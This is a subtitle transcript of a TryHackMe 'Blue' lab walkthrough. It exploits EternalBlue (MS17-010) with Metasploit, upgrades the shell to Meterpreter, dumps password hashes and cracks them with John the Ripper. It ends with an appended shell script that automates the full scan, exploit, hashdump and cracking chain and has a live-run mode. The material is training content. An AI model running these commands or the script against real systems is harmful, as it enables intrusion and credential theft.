1 00:00:00,710 --> 00:00:05,780 In this video, we are going to practice pen testing with the TryHackMe platform for free. 2 00:00:06,830 --> 00:00:11,210 We are going to hack into one of the easiest machines on the platform, called Blue. 3 00:00:11,720 --> 00:00:19,190 And we are going to follow all pentesting steps from scanning to exploitation, post-exploitation, elevating 4 00:00:19,190 --> 00:00:21,110 privileges and exfiltration. 5 00:00:21,590 --> 00:00:27,020 If you do not have an account on TryHackMe, go to the platform and create an account for free, which is 6 00:00:27,020 --> 00:00:27,800 very easy. 7 00:00:28,040 --> 00:00:34,190 From the Learn tab, you can search for the Blue machine and open it. Instead of using our own Kali machine, 8 00:00:34,220 --> 00:00:39,080 we are going to use the free AttackBox that is provided by TryHackMe for free. 9 00:00:39,110 --> 00:00:43,520 Just click on Start AttackBox and it will start in the split tab. 10 00:00:54,580 --> 00:00:58,840 You can click the button to view the AttackBox in fullscreen to open it in another tab. 11 00:01:03,550 --> 00:01:09,130 Once you have the AttackBox open in a separate tab, the first step is to scan the machine. 12 00:01:10,400 --> 00:01:11,690 Open a new terminal. 13 00:01:15,010 --> 00:01:17,170 And use the command as shown on the screen. 14 00:01:18,940 --> 00:01:24,700 We are going to use nmap. -sS here represents the stealth scan. 15 00:01:24,850 --> 00:01:28,540 -sC will run all default scripts against the machine. 16 00:01:29,440 --> 00:01:34,870 -sV is used for version enumeration and -O will check for the operating system of the machine. 17 00:01:35,560 --> 00:01:40,780 Now you can see that a number of ports are open on the machine, including 445, which 18 00:01:40,780 --> 00:01:43,120 we are going to target in this tutorial. 
19 00:01:46,400 --> 00:01:51,200 If you scroll down, you can also see the OS version, which is Windows 7 Professional Service 20 00:01:51,200 --> 00:01:55,280 Pack 1, and the versions of other services that are running on it. 21 00:01:55,610 --> 00:01:58,400 Let's go back and try to answer some questions. 22 00:01:58,790 --> 00:02:04,010 The next question is how many ports are open with port number under 1000, which we have already seen. 23 00:02:05,530 --> 00:02:07,090 Which are three in our case. 24 00:02:09,389 --> 00:02:14,400 In the next step, we can run the vulnerability scanner scripts of Nmap against the machine. 25 00:02:15,930 --> 00:02:17,850 Then use the command as shown on the screen. 26 00:02:18,760 --> 00:02:24,820 And you can see that it has told us that the machine is vulnerable to the MS17-010 vulnerability, which is 27 00:02:24,820 --> 00:02:25,690 EternalBlue. 28 00:02:27,650 --> 00:02:29,630 Let's paste the answer in TryHackMe. 29 00:02:31,570 --> 00:02:32,890 Now the answer is correct. 30 00:02:35,790 --> 00:02:39,840 Now, in the next section, we are going to use Metasploit to exploit this machine. 31 00:02:40,610 --> 00:02:41,880 Open a new terminal. 32 00:02:43,900 --> 00:02:45,280 And start Metasploit 33 00:02:46,250 --> 00:02:47,960 with the msfconsole command. 34 00:02:53,140 --> 00:02:54,610 Now search for EternalBlue 35 00:02:54,640 --> 00:02:54,850 or 36 00:02:54,850 --> 00:02:56,560 MS17-010. 37 00:02:57,660 --> 00:03:00,090 And you will see a number of modules listed. 38 00:03:01,660 --> 00:03:03,220 We are going to use the exploit 39 00:03:03,220 --> 00:03:05,740 ms17_010_eternalblue. 40 00:03:10,680 --> 00:03:13,470 Just use the command use and the full name of the exploit. 41 00:03:17,170 --> 00:03:19,850 Now, to check the parameters that are required by the exploit, 42 00:03:19,870 --> 00:03:21,400 give the command options. 43 00:03:25,730 --> 00:03:30,020 And you can see that we need to provide RHOSTS as the target of the exploit. 
44 00:03:31,880 --> 00:03:34,190 Now if we go back to TryHackMe, 45 00:03:35,380 --> 00:03:40,990 it has asked us to change the payload to windows/x64/shell/reverse_tcp. 46 00:03:42,070 --> 00:03:43,180 Let's try to do that. 47 00:03:54,560 --> 00:03:55,450 Now go back to TryHackMe. 48 00:03:56,000 --> 00:04:00,800 And the next question was what parameter we are required to set, which is RHOSTS. 49 00:04:01,730 --> 00:04:03,620 Let's type RHOSTS and click submit. 50 00:04:06,410 --> 00:04:07,880 Now type options again. 51 00:04:08,600 --> 00:04:12,050 And set RHOSTS to our target IP 52 00:04:12,590 --> 00:04:13,610 with the set command. 53 00:04:22,890 --> 00:04:24,510 Now give the command exploit. 54 00:04:25,800 --> 00:04:26,970 It will take a while. 55 00:04:27,880 --> 00:04:29,650 And we get a Meterpreter session. 56 00:04:31,120 --> 00:04:35,490 However, we were required to obtain a shell, not a Meterpreter session. 57 00:04:35,500 --> 00:04:37,750 I think our payload has not been set. 58 00:04:37,960 --> 00:04:40,600 Just exit it and set the payload again. 59 00:04:45,530 --> 00:04:46,670 Let's type options. 60 00:04:46,670 --> 00:04:49,640 And we can see that our payload has been set correctly now. 61 00:04:53,270 --> 00:04:54,470 Now exploit again. 62 00:05:01,240 --> 00:05:02,560 And we have got the shell. 63 00:05:05,810 --> 00:05:06,650 Now give the command 64 00:05:06,680 --> 00:05:10,730 whoami to check for the current user, which is SYSTEM in this case. 65 00:05:12,560 --> 00:05:16,220 Now go back to TryHackMe and mark the steps as completed. 66 00:05:21,690 --> 00:05:24,450 Now let's background this session with Control-Z. 67 00:05:32,300 --> 00:05:34,760 You can check the active sessions with the sessions command. 68 00:05:35,240 --> 00:05:36,710 And here we have a session. 69 00:05:41,400 --> 00:05:45,180 Now, in the next step, we are going to upgrade this shell to Meterpreter. 
70 00:05:47,140 --> 00:05:49,840 And we are going to use a post-exploitation module. 71 00:05:56,120 --> 00:05:57,710 Search for shell_to_meterpreter. 72 00:06:04,640 --> 00:06:08,240 Now use this module: post/multi/manage/shell_to_meterpreter. 73 00:06:16,130 --> 00:06:17,490 We can also give the command 74 00:06:17,510 --> 00:06:19,760 use 0 to use that. 75 00:06:21,090 --> 00:06:22,410 Let's check the options, 76 00:06:23,800 --> 00:06:25,810 where we need to provide the session number. 77 00:06:26,930 --> 00:06:31,190 Now give the command set SESSION 2 to select the ongoing session. 78 00:06:36,770 --> 00:06:38,720 And then use the command exploit. 79 00:06:46,460 --> 00:06:51,500 And you can see that our post module execution has been completed and a Meterpreter session has 80 00:06:51,500 --> 00:06:53,000 been opened in the background. 81 00:06:53,690 --> 00:06:54,500 You can check 82 00:06:55,430 --> 00:06:56,540 with the sessions command. 83 00:07:04,050 --> 00:07:09,180 In order to open up the session, use the command sessions -i 3. 84 00:07:10,210 --> 00:07:14,180 We can use different Meterpreter commands now, such as ls. 85 00:07:16,910 --> 00:07:19,550 Or ps to list all running processes. 86 00:07:21,760 --> 00:07:26,410 You can also check the list of commands that are supported by Meterpreter with the help command. 87 00:07:29,680 --> 00:07:33,670 Now, let's just migrate this Meterpreter session to an active process. 88 00:07:34,990 --> 00:07:38,860 We are going to migrate to a service that is running in the background. 89 00:07:41,050 --> 00:07:42,910 Let's note down its PID. 90 00:07:49,590 --> 00:07:51,180 And use the command migrate. 91 00:07:56,250 --> 00:07:59,280 And our Meterpreter session will be migrated to the process. 92 00:08:01,130 --> 00:08:08,000 You can use the command getuid to know the current user, and we can also dump the hashes with the hashdump command. 93 00:08:09,410 --> 00:08:09,620 Now, 
94 00:08:09,620 --> 00:08:12,710 let's go back to TryHackMe and answer the questions. 95 00:08:13,100 --> 00:08:17,270 We have used the shell_to_meterpreter module to escalate our privileges. 96 00:08:20,130 --> 00:08:22,160 We were required to change the SESSION in 97 00:08:22,170 --> 00:08:23,460 the options menu. 98 00:08:29,440 --> 00:08:33,460 And mark some actions that we have already completed as completed. 99 00:08:35,830 --> 00:08:37,960 We already escalated our privileges: 100 00:08:38,559 --> 00:08:39,150 whoami 101 00:08:39,159 --> 00:08:39,789 command. 102 00:08:42,289 --> 00:08:44,330 We have also migrated to another process. 103 00:08:47,240 --> 00:08:50,960 Now let's move to the next task, which is cracking some passwords. 104 00:08:52,460 --> 00:08:59,060 We have already listed the usernames and hashes with the hashdump command, so the non-default user is Jon 105 00:08:59,060 --> 00:08:59,930 on the machine. 106 00:09:04,050 --> 00:09:06,300 In the next step, we are going to crack its hash. 107 00:09:07,380 --> 00:09:07,920 Let's copy 108 00:09:07,920 --> 00:09:08,640 the hash. 109 00:09:12,740 --> 00:09:15,380 Create an empty text file and paste the hash in it. 110 00:09:21,040 --> 00:09:21,190 Now 111 00:09:21,190 --> 00:09:21,850 save it. 112 00:09:23,090 --> 00:09:25,790 We are going to use John the Ripper to crack this hash. 113 00:09:26,060 --> 00:09:29,810 Right-click in the folder and open the terminal in the same folder. 114 00:09:30,810 --> 00:09:36,090 So the first step is to locate the rockyou dictionary that is available in most of the penetration testing 115 00:09:36,090 --> 00:09:36,750 distros. 116 00:09:40,780 --> 00:09:46,120 And we have the path for the rockyou dictionary, which is located in /usr/share/wordlists. 117 00:09:49,770 --> 00:09:52,530 Now to crack the hash, use the command as shown on the screen. 118 00:09:52,680 --> 00:09:58,170 Specify the dictionary with the -w flag and you can see that John has cracked our password. 
119 00:10:01,640 --> 00:10:05,540 So copy this password and paste it in TryHackMe as the answer. 120 00:10:11,110 --> 00:10:13,180 Now the next step is to find the flags. 121 00:10:13,570 --> 00:10:19,030 There are multiple ways to do that, but we are going to search for these flags with Meterpreter. 122 00:10:20,350 --> 00:10:24,130 We can use the command search within Meterpreter to search for the flags. 123 00:10:31,040 --> 00:10:31,340 Here, 124 00:10:31,340 --> 00:10:32,540 all flags are listed. 125 00:10:34,140 --> 00:10:37,860 Now let's just check the contents of these flags one by one. 126 00:10:43,220 --> 00:10:44,490 I think there is a typo. 127 00:10:47,850 --> 00:10:50,730 And we have our first flag, which is at the root of the machine. 128 00:10:51,780 --> 00:10:54,120 Just copy the flag and paste it into TryHackMe. 129 00:11:04,080 --> 00:11:06,750 Now the second flag is located in the config folder. 130 00:11:09,640 --> 00:11:10,720 Just copy the path. 131 00:11:16,460 --> 00:11:19,040 And get the contents of this flag with Meterpreter. 132 00:11:20,420 --> 00:11:20,810 Now 133 00:11:20,810 --> 00:11:23,990 we may need to change the backslashes into forward slashes. 134 00:11:25,420 --> 00:11:25,840 Let's type it. 135 00:11:25,840 --> 00:11:28,360 And then we have our second flag. 136 00:11:30,250 --> 00:11:32,740 Just copy the flag and paste it into TryHackMe. 137 00:11:39,940 --> 00:11:41,770 Now, let's just take the third flag. 138 00:11:45,110 --> 00:11:46,910 Copy the location of the third flag. 139 00:11:48,970 --> 00:11:50,890 It is located in the Documents folder. 140 00:11:55,030 --> 00:11:56,200 Cat it out with 141 00:11:56,200 --> 00:11:56,710 Meterpreter, 142 00:11:57,500 --> 00:11:59,870 changing backslashes to forward slashes. 143 00:12:02,860 --> 00:12:03,670 And enter. 144 00:12:06,700 --> 00:12:08,910 Now copy the flag and paste it 145 00:12:08,950 --> 00:12:09,110 in 146 00:12:09,110 --> 00:12:10,060 TryHackMe. 147 00:12:13,880 --> 00:12:14,810 Then submit. 
148 00:12:21,680 --> 00:12:25,070 Now we have this question answered; mark it as complete. 149 00:12:27,530 --> 00:12:28,910 And we have completed the room. 150 00:12:31,370 --> 00:12:36,560 I hope you enjoyed this room and learned how to do pentesting with a practical approach.
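As an added example that is not part of the video, the following POSIX shell script strings together the commands narrated above: the nmap scans with the flags the video describes, the Metasploit exploit and payload plus the shell_to_meterpreter post module as an msfconsole resource script, a filter that turns hashdump output into John the Ripper input, and the backslash-to-forward-slash fix used for Meterpreter paths. The target and AttackBox IPs, the assumption that the EternalBlue shell becomes session 1 in a fresh msfconsole, the hashdump sample and the flag path in the demo are constructed placeholders, not values from the room.

```shell
#!/bin/sh
# Added example (not from the video): scripts the TryHackMe "Blue" workflow.
# RHOST/LHOST are placeholders; export them before running against a real box.
set -eu

RHOST="${RHOST:-10.10.10.10}"   # placeholder target IP (assumption)
LHOST="${LHOST:-10.10.10.11}"   # placeholder AttackBox IP (assumption)
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"

# Scanning: -sS SYN ("stealth") scan, -sC default scripts, -sV version
# detection, -O OS detection, grepable output kept for the port count below;
# then the "vuln" script category, which includes smb-vuln-ms17-010.
scan_target() {
    nmap -sS -sC -sV -O -oG "$1.gnmap" "$1"
    nmap --script vuln -p 445 "$1"
}

# Answers "how many open ports under N" from grepable nmap output on stdin.
# Port entries in that format look like "445/open/tcp//microsoft-ds///".
count_open_ports_below() {
    awk -v lim="$1" '
        { for (i = 1; i <= NF; i++)
              if ($i ~ /^[0-9]+\/open\//) { split($i, p, "/"); if (p[1] + 0 < lim + 0) n++ } }
        END { print n + 0 }'
}

# Exploitation and shell upgrade as an msfconsole resource script.
# "exploit -z" returns without dropping into the new shell, so the post
# module can be run against it from the same script. SESSION 1 assumes a
# fresh console where the EternalBlue shell is the first session opened.
write_msf_rc() {
    cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $1
set LHOST $2
set payload windows/x64/shell/reverse_tcp
exploit -z
use post/multi/manage/shell_to_meterpreter
set SESSION 1
set LHOST $2
run
sessions -l
EOF
}

# Keeps only non-built-in accounts (RID >= 1000, i.e. not Administrator/Guest)
# from meterpreter hashdump output on stdin; the NT field must be 32 hex chars.
# john --format=NT accepts these pwdump-style lines unchanged.
hashdump_to_john() {
    awk -F: 'NF >= 4 && $2 + 0 >= 1000 && length($4) == 32'
}

crack_hash() {
    john --format=NT --wordlist="$WORDLIST" "$1"
    john --format=NT --show "$1"
}

# Meterpreter's cat took forward slashes in the video; convert a Windows path.
win_to_msf_path() {
    printf '%s\n' "$1" | tr '\\' '/'
}

# Constructed sample of hashdump output (not the room's real hashes).
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::'

if [ "${BLUE_RUN:-0}" = "1" ]; then
    # Live run on the AttackBox. After msfconsole exits, save the hashdump
    # output from the meterpreter session to hashdump.txt and re-run to crack.
    scan_target "$RHOST"
    echo "open ports under 1000: $(count_open_ports_below 1000 < "$RHOST.gnmap")"
    write_msf_rc "$RHOST" "$LHOST" > blue.rc
    msfconsole -q -r blue.rc
    if [ -f hashdump.txt ]; then
        hashdump_to_john < hashdump.txt > jon.hash
        crack_hash jon.hash
    fi
else
    # Offline demo: show the generated resource script and the john input.
    write_msf_rc "$RHOST" "$LHOST"
    printf '%s\n' "$SAMPLE_HASHDUMP" | hashdump_to_john
fi
```

Run it with no arguments to see the generated resource script and the filtered hash line; set `BLUE_RUN=1 RHOST=<target> LHOST=<attackbox>` on the AttackBox to execute the scan and exploit chain for real. The video had to `set SESSION 2` because its console already held an earlier session, so check `sessions -l` and adjust the number if the console is not fresh.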